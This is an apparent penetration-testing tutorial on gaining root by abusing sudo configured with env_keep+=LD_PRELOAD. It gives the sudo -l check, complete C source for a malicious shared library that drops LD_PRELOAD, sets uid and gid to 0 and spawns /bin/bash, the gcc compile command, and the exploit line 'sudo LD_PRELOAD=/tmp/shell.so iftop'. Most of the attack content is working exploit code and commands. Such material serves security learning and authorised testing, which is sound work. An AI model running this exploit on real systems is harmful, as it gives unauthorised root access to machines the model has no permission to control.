LD_PRELOAD

LD_PRELOAD is an environment variable honoured by the dynamic linker (ld.so) on most UNIX-like systems: every shared object it names is mapped before any other library, and its initialisation code runs before the program's own main(). ld.so ignores it for setuid binaries, so on its own it is not a privilege escalation; it becomes one when sudo is configured to pass the variable through to the command it runs as root (env_keep+=LD_PRELOAD in sudoers). In that case a library we control is loaded into a root process and our code runs as root.

Check the sudo rules first; the output must show env_keep+=LD_PRELOAD and at least one command we are allowed to run as root:

sudo -l

Create the malicious library in C (shell.c)

Code Breakdown:

  • Include stdio.h, stdlib.h (unsetenv, system), sys/types.h and unistd.h (setgid/setuid are declared there)

  • Unset the LD_PRELOAD environment variable, so the shell we spawn (and every child it runs) does not load the library again; otherwise system() -> /bin/sh re-triggers the library in a fork loop

  • Set the gid and uid to 0 (root); the sudo'd process already runs with effective uid 0, so these calls succeed and leave both the real and effective ids as root

  • Then execute /bin/bash, which now runs as root (uid 0)
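The library the breakdown describes, written out as an added example (this is not code from the original page). It assumes the file name shell.c and the target /bin/bash. Two details differ from the breakdown: the entry point is a GCC constructor named shell_so_init rather than a hand-written _init, and it carries two guards, acting only when LD_PRELOAD is actually set and spawning the shell only once setuid(0) has succeeded.

```c
/* shell.c: loaded into a root process through sudo's LD_PRELOAD pass-through */
#define _POSIX_C_SOURCE 200809L   /* declares setenv/unsetenv/setuid/setgid */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Remove LD_PRELOAD from the process environment so that the shell spawned
 * below (and every child it runs) does not map shell.so again. Without this,
 * system() -> /bin/sh would re-run the constructor in a fork loop.
 * Returns 0 on success, like unsetenv(). */
int scrub_preload(void)
{
    return unsetenv("LD_PRELOAD");
}

/* Make the real and effective ids root. Under sudo the process already has
 * euid 0, so setgid(0)/setuid(0) succeed; outside sudo they fail with EPERM.
 * Returns 1 when the process is now fully root, 0 otherwise. */
int become_root(void)
{
    if (setgid(0) != 0)
        return 0;
    if (setuid(0) != 0)
        return 0;
    return getuid() == 0 && geteuid() == 0;
}

/* Constructor: the dynamic linker calls it when it maps shell.so, i.e. before
 * main() of whatever command sudo executed (iftop in the text). */
static void shell_so_init(void) __attribute__((constructor));

static void shell_so_init(void)
{
    /* Only act when we were actually injected through LD_PRELOAD; if the
     * object got into the process some other way, stay inert. */
    if (getenv("LD_PRELOAD") == NULL)
        return;

    scrub_preload();

    /* A shell that is not root is useless here (e.g. the target was started
     * without sudo), so bail out instead of spawning one. */
    if (!become_root())
        return;

    system("/bin/bash");
}
```

Because the entry point is a constructor rather than _init, a plain gcc -fPIC -shared -o shell.so shell.c is enough; adding -nostartfiles as in the compile step below is harmless. Put shell.so somewhere root can read it (/tmp in the text) and reference it by absolute path.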

Compile (-nostartfiles is needed when the library provides its own _init, which would otherwise clash with the _init linked in from crti.o)

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Set LD_PRELOAD to the absolute path of the library and run any command sudo lets us execute as root; the dynamic linker maps shell.so into the root process and runs our code before the command's own main(). The command only has to be dynamically linked, so what iftop does is irrelevant:

sudo LD_PRELOAD=/tmp/shell.so iftop